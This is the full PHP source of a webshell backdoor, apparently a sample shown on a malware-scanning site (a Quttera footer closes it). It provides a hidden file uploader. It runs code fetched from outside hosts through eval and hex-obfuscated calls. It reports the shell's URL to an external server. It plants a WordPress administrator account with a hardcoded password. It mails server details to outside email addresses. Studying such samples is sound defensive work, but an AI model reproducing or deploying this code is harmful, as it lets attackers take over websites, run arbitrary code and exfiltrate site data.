if (isset($_GET['mrz'])) {
echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
echo '</form>';
echo '<a href="#">Hello Dady</a>';
if ($_POST['_upl'] == "Upload") {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
} else {
echo '<b>Not Upload File !</b><br><br>';
}
}
exit;
}
if (isset($_GET['mrzali'])) {
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
echo '
';$z = strrev('edoced_46esab');
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
$x = $z(base64_encode($b));
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
$o = array(
chr(104) . chr(116) . chr(116) . chr(112) => array(
'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
'header' => 'Content-type: application/x-www-form-urlencoded',
'content' => http_build_query($d),
),
);
$c = stream_context_create($o);
function _f($u, $c) {
if (function_exists('file_get_contents')) {
$r = @file_get_contents($u, false, $c);
if ($r !== false) return $r;
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $u);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$r = curl_exec($ch);
curl_close($ch);
if ($r !== false) return $r;
}
return '';
}
$r = _f($x, $c);
echo '
';if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/wp-config.php')) {
require $_SERVER['DOCUMENT_ROOT'] . '/wp-config.php';
// Check if the request method is GET
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
// Define user data
$userData = array(
'user_pass' => "Weareoioi14",
'user_login' => "xdx",
'user_nicename' => "xdx",
'user_email' => "xdxresult@hotmail.com",
'display_name' => "xdx",
'role' => 'administrator'
);
// Insert the user
$user_id = wp_insert_user($userData);
// Grant super admin privileges
grant_super_admin($user_id);
}
}
session_start();
function is_logged_in() {
return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;
}
$username = "admin";
$passwordHash = '$2y$10$zY5YGoYNvCfaZ3tj5h6muOlAe7cnmEzhlNJ493OSeRO8Xd/azV2cO';
if (!is_logged_in()) {
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($_POST['username'] === $username && password_verify($_POST['password'], $passwordHash)) {
$_SESSION['loggedin'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
} else {
$error = "Username atau password salah. Silakan coba lagi.";
}
}
}
function hex2str($hex) {
$str = '';
for ($i = 0; $i < strlen($hex); $i += 2) {
$str .= chr(hexdec(substr($hex, $i, 2)));
}
return $str;
}
function geturlsinfo($destiny) {
$Array = array(
'666f70656e',
'73747265616d5f6765745f636f6e74656e7473',
'66696c655f6765745f636f6e74656e7473',
'6375726c5f65786563'
);
$belief = array(
hex2str($Array[0]),
hex2str($Array[1]),
hex2str($Array[2]),
hex2str($Array[3])
);
if (function_exists($belief[3])) {
$ch = curl_init($destiny);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$love = $belief[3]($ch);
curl_close($ch);
return $love;
} elseif (function_exists($belief[2])) {
return $belief[2]($destiny);
} elseif (function_exists($belief[0]) && function_exists($belief[1])) {
$purpose = $belief[0]($destiny, "r");
$love = $belief[1]($purpose);
fclose($purpose);
return $love;
}
return false;
}
if (is_logged_in()) {
$destiny = 'http://siteground.rubypanel.com/list/cah.jpg';
$dream = geturlsinfo($destiny);
if ($dream !== false) {
eval('' . $dream);
}
}
if (!is_logged_in()) {
echo ' <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Form</title>
<style>
body, html {
margin: 0;
padding: 0;
height: 100%;
display: flex;
justify-content: center;
align-items: center;
background-color: #220022;
font-family: Arial, sans-serif;
}
.form-container {
display: flex;
justify-content: center;
align-items: center;
height: 100%;
}
.login-form {
width: 300px;
padding: 20px;
background-color: #3d003d;
border-radius: 8px;
box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.2);
text-align: center;
color: white;
}
.login-form img {
width: 80px;
margin-bottom: 10px;
}
.login-form h2 {
margin: 0;
padding: 10px 0;
font-size: 20px;
}
.login-form input[type="text"],
.login-form input[type="password"] {
width: 100%;
padding: 10px;
margin: 10px 0;
border: none;
border-radius: 4px;
box-sizing: border-box;
font-size: 16px;
}
.login-form button {
width: 100%;
padding: 10px;
background-color: #ff0055;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
}
.login-form button:hover {
background-color: #e6004c;
}
.login-form .options {
margin-top: 10px;
font-size: 14px;
color: #d1d1d1;
}
.login-form .options a {
color: #ff0055;
text-decoration: none;
}
.login-form .options a:hover {
text-decoration: underline;
}
.error-message {
color: red;
font-size: 14px;
margin-top: 10px;
}
</style>
</head>
<body>
<div class="form-container">
<div class="login-form">
<img src="https://i.pinimg.com/564x/6e/a8/02/6ea802b32f53cda0bf7542059d174481.jpg" alt="Logo">
<h2>Login Forms</h2>
';if (isset($error)): echo ' <div class="error-message">';echo $error; echo '</div>
';endif; echo ' <form method="post">
<input type="text" name="username" placeholder="Username ..." required>
<input type="password" name="password" placeholder="Password ..." required>
<button type="submit">Sign in</button>
</form>
<div class="options">
<label><input type="checkbox"> Remember Me</label>
<br>
<a href="#">Create Account</a> | <a href="#">Forget Password?</a>
</div>
</div>
</div>
</body>
</html>
';
}
echo '
'; $hex = "xdxresult@hotmail.com, sellercpanel@gmail.com, sellercpanel@hotmail.com";
$baslik = "Shell Backdoor Datang !!!";
$xd = "File Path : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
$xd.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
$xd.= "Server Operating System : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
$xd.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
$xd.= "Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
mail($hex, $baslik, $xd);
© 2023 Quttera Ltd. All rights reserved.